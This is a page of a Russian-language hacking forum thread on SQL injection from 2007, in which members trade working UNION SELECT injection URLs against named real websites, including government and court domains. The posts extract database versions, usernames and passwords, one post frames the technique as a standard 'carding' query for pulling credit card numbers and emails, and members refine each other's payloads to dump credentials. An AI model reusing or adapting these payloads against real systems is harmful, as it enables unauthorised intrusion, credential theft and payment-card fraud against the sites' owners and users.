HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 108 из 1602 « Первая < 85898 104 105 106 107 108 109 110 111 112 1181582086081108 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.03.2007, 00:36
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
[ cash ], ты наркоман что ле или просто не знаешь что делает эта функция?
давай представим стандартный кардерский запрос c функцией concat()
select+1,concat(id,char(58),email,char(58),ccn,cha r(58),name,......),3
не проще ли сказать с помощью функцией CONCAT_WS()
select+1,concat_ws(char(58),id,email,ccn,name,...) ,3

Если ты просто не знаешь что она делает то эта функция в учебнике выглядит так CONCAT_WS(разделитель,строка1,с рока2,строка3)
Когда объеденяется 2 или 3 столбца то это конечно не нужно, но при больших запросах, где надо вывести много инфы лучше использовать эту функцию =)

ЗЫ У тебя на сайте написано
Цитата:
Взлом баз данных(MySQL,MsSQL,PoastageSQL,Oracle)
/me плачет
Последний раз редактировалось Spyder; 17.03.2007 в 00:45..
 
Ответить с цитированием

  #2  
Старый 17.03.2007, 01:06
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию
Код:
http://www.rda.ge/news.php?id=-4+union+select+1,2,CONCAT_WS(char(58),user(),database(),version()),4,5,6,7,8,9,10/*

Код:
http://www.nsf.ac.lk/events.php?ID=22%20UNION%20SELECT%201,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+mysql.user+limit+1,1/*
Последний раз редактировалось XTErner; 17.03.2007 в 01:08..
 
Ответить с цитированием

  #3  
Старый 17.03.2007, 04:07
chezz
Познающий
Регистрация: 19.02.2007
Сообщений: 45
Провел на форуме:
148427

Репутация: 19
По умолчанию
Код:
http://www.fur.su/index.php?id=-1+union+select+1,2,3,4,5/*&type=1&lang=r&pg=1
 
Ответить с цитированием

  #4  
Старый 17.03.2007, 14:56
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию
http://www.opera.ge/eng/news.php?id=-328+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,concat(password,0x3a,username),21,2 2,23,24,25,26,27,28,29,30,31,32+from+users/*&menu=news

))думал браузер
 
Ответить с цитированием

  #5  
Старый 17.03.2007, 15:18
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
По умолчанию
http://www.dama.cz/tisk.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,table _name,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+l imit+65,1/*

5-ая версия))) 66 таблиц .
 
Ответить с цитированием

  #6  
Старый 17.03.2007, 21:06
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
По умолчанию
http://www.smalldog.com/mydog/number.php?id=-1+union+select+convert(version()+using+latin1)/*
 
Ответить с цитированием

  #7  
Старый 17.03.2007, 21:14
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
Код:
http://www.sportexpo.ru/print_base.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4/*
 
Ответить с цитированием

  #8  
Старый 17.03.2007, 21:31
valiko
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
Провел на форуме:
1237085

Репутация: 452
По умолчанию
Код:
http://www.dance.lt/news.php?strid=2871&id=-4244+GROUP+BY+A.id,A.title,pd,pt,A.lead,A.body,A.pic_alt,A.pic_capt,A.pic_l,SNS.name,SNA.name+union+select+1,2,user(),version(),5,database(),7,8,9,0,1,2,3/*
Доступа к mysql.user нет
 
Ответить с цитированием

  #9  
Старый 17.03.2007, 21:39
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
По умолчанию
Цитата:
Сообщение от valiko  
Код:
http://www.dance.lt/news.php?strid=2871&id=-4244+GROUP+BY+A.id,A.title,pd,pt,A.lead,A.body,A.pic_alt,A.pic_capt,A.pic_l,SNS.name,SNA.name+union+select+1,2,user(),version(),5,database(),7,8,9,0,1,2,3/*
Доступа к mysql.user нет
http://www.dance.lt/news.php?strid=2871&id=-4244+GROUP+BY+A.id,A.title,pd,pt,A.lead,A.body,A.p ic_alt,A.pic_capt,A.pic_l,SNS.name,SNA.name+union+ select+1,concat(username,char(58),password),3,4,5, 6,7,8,9,0,1,2,3+from+users/*

Так лучше)))
 
Ответить с цитированием

  #10  
Старый 17.03.2007, 15:40
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
Цитата:
http://www.bap10.uscourts.gov/rules.php?part=3&ID=-6+union+select+null,null,null,null,null,123
гов =\ чё то там ничё не получается вывести
update
Цитата:
http://www.tam.ca.gov/view.php?id=-1+union+select+1,2,version(),4
Последний раз редактировалось Spyder; 17.03.2007 в 16:09..
 
Ответить с цитированием
Ответ
Страница 108 из 1602 « Первая < 85898 104 105 106 107 108 109 110 111 112 1181582086081108 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.